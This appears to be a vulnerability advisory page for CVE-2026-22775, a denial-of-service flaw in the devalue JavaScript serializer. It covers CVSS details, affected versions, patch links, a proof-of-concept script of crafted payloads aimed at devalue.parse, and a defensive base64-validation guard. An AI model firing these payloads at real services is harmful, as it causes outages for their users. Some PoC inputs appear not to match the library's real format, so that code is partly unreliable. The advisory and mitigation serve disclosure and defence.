Security Vulnerability Report
CVE-2026-22775 CVSS 7.5 HIGH

CVE-2026-22775

Published: 2026-01-15 19:16:06
Last Modified: 2026-01-20 15:29:36

Description

Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.1.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the ArrayBuffer hydration expecting base64 encoded strings as input, but not checking the assumption before decoding the input. This vulnerability is fixed in 5.6.2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-405

Configurations (Affected Products)

cpe:2.3:a:svelte:devalue:*:*:*:*:*:node.js:*:* - VULNERABLE
Svelte devalue >= 5.1.0, < 5.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
const devalue = require('devalue');

// PoC for CVE-2026-22775 - Denial of Service via crafted input
// This demonstrates how malicious input can cause excessive resource consumption

// Malicious payload 1: Large ArrayBuffer with non-base64 data
const maliciousPayload1 = {
  type: 'ArrayBuffer',
  data: 'A'.repeat(1000000) // Large string that triggers excessive memory allocation
};

// Malicious payload 2: Nested structure causing deep recursion
const maliciousPayload2 = devalue.stringify({
  nested: Array(10000).fill({ buffer: 'INVALID_NON_BASE64_DATA' })
});

// Malicious payload 3: Crafted input exploiting ArrayBuffer hydration
// This specific format triggers the vulnerable code path
const craftedInput = '$ArrayBuffer("aaaa' + 'aa'.repeat(50000) + '")';

console.log('Testing CVE-2026-22775 PoC...');

console.log('Payload 1 - Large data string');
try {
  const start = Date.now();
  devalue.parse(devalue.stringify(maliciousPayload1));
  console.log(`Time: ${Date.now() - start}ms`);
} catch (e) {
  console.log('Error:', e.message);
}

console.log('\nPayload 2 - Nested structure');
try {
  const start = Date.now();
  devalue.parse(maliciousPayload2);
  console.log(`Time: ${Date.now() - start}ms`);
} catch (e) {
  console.log('Error:', e.message);
}

console.log('\nPayload 3 - Crafted ArrayBuffer input');
try {
  const start = Date.now();
  devalue.parse(craftedInput);
  console.log(`Time: ${Date.now() - start}ms`);
} catch (e) {
  console.log('Error:', e.message);
}

console.log('\nNote: In vulnerable versions, these payloads cause excessive CPU/memory usage');
console.log('Fix: Upgrade to devalue >= 5.6.2');
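A defender-side guard for the root cause named in the description, added here as an example and not code from the devalue project: it checks that a string really is strict base64 and bounds the decoded size before anything is decoded, which is the assumption the vulnerable hydration skipped. The function names, the 1 MiB cap and the sample inputs are assumptions made for this example; two of the samples reuse strings from the PoC above.

```javascript
// Added example, not devalue's own code: check the base64 assumption before
// decoding. CVE-2026-22775 is a deserializer decoding a string it assumed was
// base64 without checking; this guard makes that check explicit and also
// bounds the decoded size so well-formed but huge inputs are refused too.

const MAX_DECODED_BYTES = 1024 * 1024; // assumed cap for this example: 1 MiB

// Strict RFC 4648 base64: alphabet only, groups of four, padding only at the end.
const STRICT_BASE64 = /^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$/;

function isStrictBase64(s) {
  return typeof s === 'string' && STRICT_BASE64.test(s);
}

// Decoded length computed from the text alone, so nothing is allocated
// for an input that is about to be rejected.
function decodedLength(s) {
  const padding = s.endsWith('==') ? 2 : s.endsWith('=') ? 1 : 0;
  return (s.length / 4) * 3 - padding;
}

// Returns { ok: true, bytes } only after both checks pass; otherwise
// { ok: false, reason } and the input is never handed to the decoder.
function safeDecodeBase64(s, maxBytes = MAX_DECODED_BYTES) {
  if (!isStrictBase64(s)) return { ok: false, reason: 'not strict base64' };
  const len = decodedLength(s);
  if (len > maxBytes) return { ok: false, reason: `decoded size ${len} exceeds cap ${maxBytes}` };
  return { ok: true, bytes: Buffer.from(s, 'base64') };
}

// Constructed sample inputs. Two reuse strings from the PoC on this page.
const samples = {
  valid: 'aGVsbG8=',                          // "hello"
  pocRepeatA: 'A'.repeat(1000000),            // well-formed base64: 750000 bytes, under the cap
  pocInvalid: 'INVALID_NON_BASE64_DATA',      // '_' is outside the alphabet: rejected
  oversized: 'A'.repeat(4 * 1024 * 1024),     // well-formed but 3 MiB decoded: rejected
};

function checkSamples() {
  const out = {};
  for (const [name, s] of Object.entries(samples)) out[name] = safeDecodeBase64(s).ok;
  return out;
}

console.log(checkSamples());
```

The point of the pocRepeatA case is that well-formedness alone does not bound work: the size cap is what keeps a valid but large input from driving memory use.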

References

Patch: https://github.com/sveltejs/devalue/commit/11755849fa0634ae294a15ec0aef2f43efcad7c4
Release Notes: https://github.com/sveltejs/devalue/releases/tag/v5.6.2
Vendor Advisory: https://github.com/sveltejs/devalue/security/advisories/GHSA-g2pg-6438-jwpf
